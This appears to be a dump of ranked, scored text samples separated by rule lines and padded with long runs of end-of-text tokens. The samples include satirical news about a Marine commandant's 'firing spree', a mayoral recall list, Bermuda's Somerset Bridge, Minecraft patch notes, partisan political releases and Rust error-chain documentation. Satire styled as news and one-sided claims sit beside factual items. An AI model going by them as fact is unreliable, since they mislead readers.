exposure of marine habitats to the analyses of sub-Saharan energy infrastructure, universal basic income, and automation in the labor market, but it could be months before we know the full extent of the damage.” Talbott went on to say that the Brookings Institution had already pledged $200 million toward cleanup efforts thanks to generous donations from the William and Flora Hewlett Foundation, the Hutchins Family Foundation, and the John D. and Catherine T. MacArthur Foundation. + +Advertisement<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 90; Score = 7012352.0 +<|begin_of_text|>WASHINGTON, D.C. – “Fire them! Fire them all!” raved Gen. James Amos, foaming at the mouth as he was escorted to a waiting police cruiser in a straitjacket late Friday. Amos is en route to a high security psychiatric facility following a firing spree during which he attempted to relieve the entire United States Marine Corps. + +It began Thursday morning, when Amos unexpectedly fired his aide. Sources believe the firing was prompted when Amos saw an article in The Marine Corps Times that suggested he was becoming increasingly unhinged. The article, which contained information that caused Amos to believe it was leaked from sources close to him, alleged that he believed he was surrounded by invisible enemies who wished to ruin his legacy as Commandant through leaks to the media, sexual assaults, safety incidents, war crimes, alcohol-related incidents, wasting water, and even their own suicides. + +When Assistant Commandant Gen. John Paxton spoke up on behalf of the young officer, Amos fired him as well, believing him to be a co-conspirator. The situation soon spiraled out of control, with Amos running down the halls kicking in doors, and firing everyone he encountered. Victims of this portion of the spree included several of Amos’ deputy commandants, large portions of their staffs, one very startled janitor, and Sen. Richard Blumenthal (D-Conn.). + +“Are you a Marine?” Amos asked, wild-eyed, not recognizing the member of the Armed Forces Committee. + +“Hell yes I am,” replied Blumenthal, who left the Marine Corps Reserve at the rank of sergeant in the mid-1970s. + +“You’re fired too!” Amos screamed into his face before running farther down the hall. + +At this point, Lt. Gen. Richard Mills and Sergeant Major Gary Weiser, the leadership of the Marine Corps Combat Development Command (MCCDC) and the highest ranking Marines left in the building, attempted to rally the remaining Marines against the Commandant’s administrative onslaught. Weiser gathered all the Marines he could find, and assembled them at a rally point identified by Mills, a hallway adjacent to Amos’ rampage. + +“Okay, here’s the plan,” Mills explained. “The Commandant’s center of gravity is his ability to fire Marines. His critical vulnerability is that he needs to be able to see us and speak to us to exercise that ability, and he’s got a limited field of vision. We’re going to exploit that by breaking into multiple groups and catching him +================================================================================ +Rank = 91; Score = 7012352.0 +<|begin_of_text|>Why Recall? Here’s a look back at Tom McKay’s first 14 months in office: + +1. In a sexual harassment special investigation by former NJ Deputy Attorney General Lee Vartan, Tom McKay was found to have sexually harassed the Township clerk and a rent leveling board volunteer by describing them as lesbians and calling them “man-haters”. McKay never apologized to either woman, but rather blames his actions on his political opponents. The investigation costs Lopatcong taxpayers more than $10,000 and the council must censure the mayor. CensureResolution + +2. Tom McKay is served with a Tort Claims notice of intent to sue subjecting the Township and its taxpayers to substantial liability for his sexual harassment behavior. + +3. Tom McKay gavels Councilwoman Maureen McCabe in a public meeting and yells at her to “shut up.” Again, he refuses to take responsibility for losing his temper. + +4. Tom McKay publicly posts his personal “10 Commandments” for behavior at public meetings, but when a resident posts beside it her 10 criticisms of his public demeanor, he has them removed. The town receives legal notice from the resident’s lawyer that the Mayor violated her First Amendment rights. + +5. Tom McKay secretly secured access to the Township’s security cameras without the knowledge or consent of the Council. He also accepted those services as a gift from a Township vendor in violation of his terms of office. + +6. Lopatcong Township loses its credit status with many of its vendors due to the Mayor’s refusal to pay bills on time. Many vendors take a “payment in advance” policy with the Township. + +7. Tom McKay refused to consider the request led by Councilwoman Ciesla to refinance to Township’s debt obligation, for spite not business, and COST Lopatcong taxpayers $200,000. + +8. Tom McKay’s politically motivated banking decisions COST Lopatcong $20,000 in lost revenues. + +9. Tom McKay offered to trade his vote to reappoint the Township’s attorney and engineer for promises that they will not contribute to his opponents’ political campaign. + +10. Tom McKay replaces a long time member of the Township Planning Board with a non-US citizen political ally who, at public meetings, refuses to Pledge Allegiance to the US Flag. + +11. Tom McKay attempts to appoint his personal sexual harassment defense lawyer as the Township’s new labor lawyer. When the Council objects, he sues them. + +12. Tom McKay attempts to appoint his personal attorney as the Township’s new general attorney +================================================================================ +Rank = 92; Score = 6914048.0 +<|begin_of_text|>Somerset Bridge is a small bridge located in the western parish of Sandys, in Bermuda, connecting Somerset Island with the mainland. The stone bridge is walled solid, save for a narrow arch near one of its banks that allows small boats to pass underneath. There is enough headroom for a motorboat to pass through comfortably but not a sailboat. To allow a sailboat with a tall mast to squeeze through, a section of the motorway over the arch was replaced with wooden planks that could be raised creating a mini drawbridge. This section is just 32 inches wide, and is widely believed to be the smallest working drawbridge in the world. + +Photo credit + +The original bridge dates back to 1620, and although the bridge was largely rebuilt in the mid 20th century, much of the original stonework remains. The bridge was originally raised using a hand crank, but now consist of two cantilevered half-spans made of thick timber panels. The panels can be grabbed by the sides and lifted to create a narrow gap just wide enough for the mast of a sailboat to pass through. Judging by the size of the gap, I believe it takes a fair amount of skill to navigate the gap without mishap. Often a sailor has to be assisted in opening the drawbridge and making the passage safely, so it’s not uncommon to find sailboat captains calling upon pedestrians for help. + +Although not quite an attraction, the bridge’s unique reputation has earned it a place on the reverse of Bermuda’s $20 bills issued in 2009. + +Photo credit + +Photo credit + +Photo credit + +Photo credit + +Photo credit + +Photo credit + +Photo credit + +Sources: Bermuda4u / Wikipedia<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 93; Score = 6914048.0 +<|begin_of_text|>Minecraft News Powered by Tumblr Minecraft Beta 1.3 * Implemented a new lighting engine with the help of MrMessiahs (can be turned off) + +* Changed the options around, added a new “Graphics options” button + +* Added beds. If all players in a map sleeps in a bed during night, the game immediately skips until morning + +* Added three new half-size blocks + +* Added Delay/Repeater redstone dust blocks + +* Added whitelisting to the server. To use, enter “whitelist ” where cmd is “on”, “off”, “add ”, “remove ”, “list” or “reload” + +* New save file format, old maps need to be converted (that might take a while..) + +* It’s now possible to have more than five save slots, and to rename saves + +* Scrollbars in both the texture pack list, and in the map selection screen + +* Replaced the Mojang splash image to reflect the new logo colors + +*.. and a bunch of bug fixes and tweaks!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 94; Score = 6881280.0 +<|begin_of_text|>GETTING GOVERNMENT OUT OF THE WAY: President Donald J. Trump has done more to stop the Government from interfering in the lives of Americans in his first 100 days than any other President in history. + +President Trump has signed 13 Congressional Review Act (CRA) resolutions in his first 100 days, more than any other President. These resolutions nullified unnecessary regulations and block agencies from reissuing them. Since CRA resolutions were introduced under President Clinton, they’ve been used only once, under President George W. Bush. + +The Wall Street Journal editorial: “So far the Trump Administration is a welcome improvement, rolling back more regulations than any President in history.” + +TAKING EXECUTIVE ACTION: In office, President Trump has accomplished more in his first 100 days than any other President since Franklin Roosevelt. + +President Trump will have signed 30 executive orders during his first 100 days. President Obama signed 19 executive orders during his first 100 days. President George W. Bush signed 11 executive orders during his first 100 days. President Clinton signed 13 executive orders during his first 100 days. President George H.W. Bush signed 11 executive orders during his first 100 days. President Reagan signed 18 executive orders during his first 100 days. President Carter signed 16 executive orders during his first 100 days. President Nixon signed 15 executive orders during his first 100 days. President Johnson signed 26 executive orders during his first 100 days. President Kennedy signed 23 executive orders during his first 100 days. President Eisenhower signed 20 executive orders during his first 100 days. President Truman signed 25 executive orders during his first 100 days. President Franklin D. Roosevelt signed 9 executive orders during his first 100 days. + +A SLEW OF LEGISLATION SIGNED: Despite historic Democrat obstructionism, President Trump has worked with Congress to pass more legislation in his first 100 days than any President since Truman.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 95; Score = 6848512.0 +<|begin_of_text|>For Immediate Release + +Note similarities to previous administration + +Top 10 disasters of the 2009 Obama administration (in no particular order): + +1. Cash for Clunkers + +2. War escalation in Afghanistan + +3. Giant government health care expansion bill + +4. Post office loses money hand over fist + +5. Stimulus package + +6. Expansion of “state secrets” doctrine + +7. Big increase in unemployment + +8. “Bailout” Geithner as Treasury Secretary + +9. Skyrocketing federal spending + +10. Huge federal deficits + +Top 10 disasters of the 2001-2008 Bush administration: + +1. Cash for Car Companies + +2. War in Iraq + +3. Giant Medicare expansion bill + +4. Post office loses money hand over fist + +5. Stimulus “rebate” checks + +6. PATRIOT Act + +7. Big increase in unemployment + +8. “Bailout” Paulson as Treasury Secretary + +9. Skyrocketing federal spending + +10. Huge federal deficits + +Wes Benedict, Libertarian Party Executive Director, commented, “Republicans and Democrats keep expanding government and creating more and more problems. We’re encouraging as many Libertarians as possible to run for Congress in 2010. In Texas, the state with the earliest filing deadline, Libertarians have already filed for 31 of 32 Congressional seats.” + +For more information, or to arrange an interview, call LP executive director Wes Benedict at 202-333-0008 ext. 222. + +The LP is America’s third-largest political party, founded in 1971. The Libertarian Party stands for free markets and civil liberties. You can find more information on the Libertarian Party at our website. + +###<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 96; Score = 6848512.0 +<|begin_of_text|>PoliZette Jimmy Carter: ‘Media Have Been Harder on Trump Than Any Other President’ Says Russia didn't change the election outcome, president's doing great on North Korea, and players should stand for the anthem + +Former President Jimmy Carter broke away from his own party, coming to President Donald Trump’s defense and saying, “The media have been harder on Trump than any other president.” + +In a wide-ranging interview with The New York Times published on Saturday, Carter seemed to ally himself with Trump, criticizing the media for its coverage of the new administration. + +Advertisement + +[lz_ndn video=”33150334″] + +“I think the media have been harder on Trump than any other president certainly that I’ve known about,” Carter told The Times. “I think they feel free to claim that Trump is mentally deranged and everything else without hesitation.” + +In addition, Carter also aligned himself with Trump on the issue of whether or not football players should stand while the national anthem is being played before games. Trump reignited the controversy in late September when he urged football coaches to bench players who choose to protest against racial injustice in the country by kneeling instead of standing during the anthem. Since then, National Football League ratings have plummeted while many sports fans expressed their disapproval of kneeling during the anthem and politicizing a patriotic tradition. + +“I think they ought to find a different way to object, to demonstrate. I would rather see all the players stand during the American anthem,” Carter said. + +The former president also pushed back against one of the prevailing narratives Democrats and liberal-leaning media outlets have pushed in the days following Trump’s astonishing Election Day victory: whether or not the Russians affected voting outcomes. In addition, Carter said he wasn’t bothered particularly with Trump’s desire to cultivate a stronger and more diplomatic relationship with Russian President Vladimir Putin. + +“At the Carter Center,” the former president said, “we deal with Putin and the Russians quite frequently concerning Syria.” + +Carter added: “I don’t think there’s any evidence that what the Russians did changed enough votes, or any votes” during the 2016 presidential election. + +Noting that he and his wife, Rosalynn, both voted for Sen. Bernie Sanders (I-Vt.) over Democratic presidential nominee Hillary Clinton during the primaries, Carter didn’t have many kind words to offer the Clintons. When The Times’ Maureen Dowd compared the Carter Center to the Clinton Foundation, Carter bristled. + +[lz_related_box id=”314330″] + +“Rosie and I put money in the Carter Center. +================================================================================ +Rank = 97; Score = 6848512.0 +<|begin_of_text|>Two Texas high-school football players stood with athletes across the country against police brutality and discrimination by protesting during the national anthem. Immediately after, they were told to hand in their uniforms. + +Sophomore Cedric Ingram-Lewis and his cousin Larry McCullough were kicked off their team at Victory & Praise Christian Academy, the Houston Chronicle reported. The pair didn't play in the Friday night game for their private church-affiliated football program in the Houston suburb Crosby. + +Ingram-Lewis raised his fist during the anthem while McCullough took a knee. Coach Ronnie Mitchem kicked them off the team when the anthem ended. + +Local high school football players kicked off team after protest during anthem (by @chroncoleman) https://t.co/mATIDFymj3 via @houstonchron — Matt Young (@Chron_MattYoung) September 30, 2017 + +"He told us that disrespect will not be tolerated," Lewis told the Houston Chronicle. "He told us to take off our uniform and leave it there." + +The coach told the Chronicle that he wanted players to participate in protests by kneeling after a touchdown or distributing pamphlets about the issues they're calling attention to—not by taking a knee during the anthem, like players across the country. + +"That was my point of view," Mitchem told the Chronicle. "Like I said, I'm a former Marine. That just doesn't fly and they knew that. I don't have any problem with those young men. We've had a good relationship. They chose to do that and they had to pay for the consequences." + +NFL protests against police brutality started over a year ago with Colin Kaepernick, but escalated last week when President Donald Trump ranted against the mostly black athletes protesting. Trump said that NFL owners should fire athletes who protested and called players who knelt during the anthem a "son of a bitch." + +"I'm definitely going to have a conversation because I don't like the way that that was handled," Lewis's mother, Rhonda Brady, told the Chronicle. "But I don't want them back on the team. A man with integrity and morals and ethics and who truly lives by that wouldn't have done anything like that."<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 98; Score = 6848512.0 +<|begin_of_text|>The error-chain crate (docs) is a new crate for dealing with Rust error boilerplate. It provides a few unique features: + +No error is ever discarded. This library primarily makes it easy to “chain” errors with the chain_err method. + +method. Introducing new errors is trivial. Simple errors can be introduced at the error site with just a string. + +Errors create and propagate backtraces. + +I think the lack of the above are widespread problems with Rust error handling, so I’m interested to hear what people think about this solution. It is inspired by quick-error (and in fact includes a hacked up version of it for internal use) as well as Cargo’s internal error handling techniques. This library is used by rustup for error handling. + +One note about usage that isn’t included in the docs: the chain_error! macro recurses deeply, so you’ll probably need to use the little-known #![recursion_limit = "1024"] macro on crates that import it. + +For detailed usage information read the docs, which are reproduced in part below. + +Declaring error types + +Generally, you define one family of error types per crate, though it’s also perfectly fine to define error types on a finer-grained basis, such as per module. + +Assuming you are using crate-level error types, typically you will define an errors module and inside it call error_chain! : + +// 